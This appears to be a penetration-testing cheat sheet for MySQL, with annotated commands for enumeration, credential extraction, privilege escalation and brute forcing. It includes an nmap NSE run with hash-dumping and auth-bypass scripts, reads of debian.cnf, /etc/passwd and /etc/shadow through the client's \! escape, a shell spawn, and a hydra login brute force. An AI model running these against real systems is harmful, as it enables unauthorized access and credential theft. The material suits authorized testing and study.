MySQL

db, enum

Ports #

Gathering Information from outside #

# nmap: service/version probe on 3306 plus the mysql-* NSE checks (audit, enum,
# empty-password, info, CVE-2012-2122 auth-bypass check, ...).
# NOTE(review): the scripts that read data (databases, dump-hashes, query, users,
# variables) presumably only return output when credentials are supplied to them;
# each script also opens its own connections, so expect the run to be visible in
# the server's logs.
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.166.72

Authentication #

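# extracting creds from files
# debian.cnf is normally root-owned 0600, so reading it already implies local root
# (worth checking the mode if it was readable).
cat /etc/mysql/debian.cnf
# Pulls printable tokens (3+ chars) out of whatever is piped in — no file is named
# here, so it reads stdin. The original class was [a-Z], an inverted range that
# makes grep -E reject the pattern; a-zA-Z is what was meant. The backslashes
# before . and * were literal inside a bracket expression and are dropped.
grep -oaE "[-_.*a-zA-Z0-9]{3,}" | grep -v "mysql_native_password"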

Gathering info inside SQL shell #

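-- Comment marker fixed: `;` is a statement terminator, not a comment, so the
-- original lines sent an empty query and then glued the note onto the next
-- statement when pasted into the client.

-- Checks version
select @@version;

-- Checks user
-- user() is the name@host the client sent; current_user() is the account the
-- server actually authenticated as and whose grants apply — they can differ.
select user();

-- checks permissions and privileges
-- A bare `show grants;` lists the current account; naming another account needs
-- SELECT on the mysql system schema.
show grants for 'root'@'localhost';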

Privesc #

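-- Breaks out from shell (comment marker fixed: `;` is not a comment in MySQL).
-- `\!` is a client-side escape: the command runs on the host where the mysql
-- client process lives, as that process's OS user, not on the database server.
-- Server-side grants play no part; what matters is where the client is running.
\! cat /etc/passwd
\! cat /etc/shadow
\! bash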

Files and directories #

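# settings
# The OS account mysqld runs as: every file the server process touches on the
# host is accessed as this user, so it bounds what a compromised server can reach.
# Anchored on the `user` directive itself: the old `grep "user"` substring-matched
# unrelated lines and `grep -v "#"` silently dropped any line carrying an inline
# comment.
grep -E '^[[:space:]]*user[[:space:]]*=' /etc/mysql/mysql.conf.d/mysqld.cnf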

Brute Force #

# mysql over ssh tunnel
# 127.0.0.1:9000 is the local end of the tunnel (-s overrides hydra's default
# port); -V prints every user/password pair as it is tried. Each attempt is a
# full login handshake at the real server, so presumably it is logged there
# (depends on the server's error-log verbosity) — confirm before relying on it.
hydra -V -L users.txt -P passwords.txt 127.0.0.1 -s 9000 mysql

Exploits #

Other resources #